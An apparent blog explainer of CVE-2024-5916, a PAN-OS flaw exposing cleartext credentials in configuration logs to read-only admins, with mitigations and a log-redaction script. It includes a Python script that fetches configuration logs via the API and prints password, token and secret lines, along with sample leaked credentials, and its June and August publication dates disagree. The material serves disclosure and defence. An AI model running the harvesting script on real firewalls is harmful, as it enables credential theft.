On June 4, 2024, Palo Alto Networks shipped a security advisory for CVE-2024-5916—an information disclosure bug in its PAN-OS operating system. This flaw is important for anyone running Palo Alto firewalls: it means even limited “read-only” admins can accidentally view highly sensitive secrets like passwords and API tokens stored *in plain text* in configuration logs.

Unlike many security bugs, exploiting CVE-2024-5916 doesn’t need fancy hacking. If you’re a local admin (even a “read-only” one) and know where to look, passwords spill right onto your screen with a few clicks. In this post, you’ll learn how this happens, see sample code and log entries, and get references you can use to better protect your environment.

---

Background: What is PAN-OS and Who is Vulnerable?

Palo Alto's PAN-OS runs on most modern PAN firewalls. These devices often connect to external services—LDAP, SAML, TACACS, cloud APIs—to authenticate users, pull security updates, or provide single sign-on. To do that, admins store passwords, access tokens, or client secrets inside PAN-OS configuration.

Because device logs can store this sensitive information (to help admins diagnose configurations), it is critical that only trusted users can access them. Due to CVE-2024-5916, however, even less trusted “read-only” admins can view the log contents and extract the secrets.

Affected versions:
- PAN-OS 10.1, 10.2, 11.0, 11.1 (check the Advisory for the fixed minor versions)

The only prerequisite is a local administrator account, even one with read-only access.

---

Exploitation Details: How CVE-2024-5916 Leaks Secrets

This vulnerability is *not* remote code execution and *not* remotely exploitable. The attacker must have local admin credentials (even just read-only). Here's how the issue plays out in real life:

Sample Log Entry Snippet

2024/05/20 10:15:34 admin@PA-VM01
Configuration change: Set system ldap-server password = "SuperSecretP@sswrd"
Configuration change: Set system api-access-token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
Configuration change: Set system tacacs-server password = "ChangeThisNow2024"

This log entry is available even to read-only administrators. That means a junior admin or an intern (with “view only” rights) could quietly steal every external credential tied into your firewall system.

A read-only admin with API access can automate this:

import requests
from lxml import etree

# Replace with your own values
PAN_HOST = "https://firewall.local"
API_KEY = "PASTE_READ_ONLY_API_KEY_HERE"

def fetch_config_logs():
    # Ask the PAN-OS XML API for configuration logs using the read-only key
    url = f"{PAN_HOST}/api/?type=log&log-type=config&key={API_KEY}"
    # verify=False disables TLS certificate validation; only acceptable for a lab device with a self-signed cert
    r = requests.get(url, verify=False)
    return etree.fromstring(r.content)

def extract_secrets(xmlroot):
    # Walk every log entry and print the ones whose config text mentions a credential
    for entry in xmlroot.xpath("//entry"):
        config_str = entry.xpath("config[1]/text()")
        if config_str:
            line = config_str[0]  # xpath() returns a list of text nodes; take the first
            if any(word in line.lower() for word in ["password", "token", "secret"]):
                print(line)

if __name__ == "__main__":
    logs_xml = fetch_config_logs()
    extract_secrets(logs_xml)

Note: Never run scripts like this in a production environment without proper permissions.

---

Why is This So Dangerous?

- Read-only != Trusted: Many organizations grant dozens of admins “read-only” rights for auditing or monitoring, not realizing this also provides cleartext passwords and tokens.

- Secrets to External Systems: The leaked secrets can let a malicious actor:
  - Connect to LDAP/AD servers, SSO providers, cloud APIs, etc.
  - Move laterally, escalate privileges elsewhere, or access sensitive data.

- Hard to Detect: The leak doesn't create extra logs or alert the system owner—a rogue admin could quietly siphon off secrets without a trace.

---

Mitigations

Upgrade PAN-OS:

Palo Alto advises all customers to update affected PAN-OS versions immediately. Newer builds sanitize secrets in configuration logs.

Restrict Read-only Access:

Audit which users have “read-only” admin, API, or log access. Remove unnecessary accounts or reduce their privileges.

Rotate Secrets:

If you suspect exposure, change all stored passwords, tokens, and client secrets on external systems.
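The rotation step is easier to act on with a list of exactly which credential fields appeared in the logs. The following Python is an added example, not code from the original post or from Palo Alto Networks: it parses constructed lines in the shape of the log excerpt above, returns the configuration paths of credentials that were exposed (without their values), and produces a redacted copy that can go into a ticket. The line format and the keyword list are assumptions based only on the excerpt.

```python
import re
from typing import List, Tuple

# Constructed sample in the shape of the log excerpt above; not a real capture.
SAMPLE_CONFIG_LOG = """\
2024/05/20 10:15:34 admin@PA-VM01
Configuration change: Set system ldap-server password = "SuperSecretP@sswrd"
Configuration change: Set system api-access-token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
Configuration change: Set system tacacs-server password = "ChangeThisNow2024"
Configuration change: Set system hostname = "PA-VM01"
"""

# One 'Set <path> = "<value>"' line as it appears in the excerpt (assumed format).
CHANGE_RE = re.compile(r'^(?P<prefix>Configuration change: Set )(?P<path>.+?) = "(?P<value>[^"]*)"$')
# Field-name fragments treated as credentials (assumed list; extend it for your config).
SECRET_KEYWORDS = ("password", "passwd", "token", "secret", "key")

def is_secret_field(path: str) -> bool:
    """Decide on the final path element only, never on the value itself."""
    last = path.split()[-1].lower()
    return any(word in last for word in SECRET_KEYWORDS)

def parse_config_changes(log_text: str) -> List[Tuple[str, str]]:
    """Return (path, value) for each 'Set' line; timestamp and other lines are skipped."""
    changes = []
    for line in log_text.splitlines():
        m = CHANGE_RE.match(line.strip())
        if m:
            changes.append((m.group("path"), m.group("value")))
    return changes

def exposed_credential_paths(log_text: str) -> List[str]:
    """Rotation checklist: paths of credentials seen in clear text (values deliberately omitted)."""
    return [path for path, _ in parse_config_changes(log_text) if is_secret_field(path)]

def redact_config_log(log_text: str) -> str:
    """Copy of the log with credential values masked so it can be shared in a ticket."""
    out = []
    for line in log_text.splitlines():
        m = CHANGE_RE.match(line.strip())
        if m and is_secret_field(m.group("path")):
            line = f'{m.group("prefix")}{m.group("path")} = "[REDACTED]"'
        out.append(line)
    return "\n".join(out)

if __name__ == "__main__":
    for path in exposed_credential_paths(SAMPLE_CONFIG_LOG):
        print("rotate:", path)
    print(redact_config_log(SAMPLE_CONFIG_LOG))
```

Each path returned maps to one external system whose credential needs rotating, while the redacted copy contains no secret values.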

---

References

- Official Palo Alto Advisory: CVE-2024-5916
- Unit 42 Threat Brief (as available)
- Palo Alto Best Practices: Admin Roles & Log Monitoring

Keep your team informed: *If you rely on PAN-OS, review your permissions and logs today.* Vulnerabilities like CVE-2024-5916 may not be flashy, but their real-world impact can be devastating if attackers get even the lowest rung of admin access.

Stay safe!
If you have follow-up questions on CVE-2024-5916 or need more mitigation tips, reach out to Palo Alto support.

Timeline

Published on: 08/14/2024 17:15:18 UTC
Last modified on: 08/20/2024 19:30:11 UTC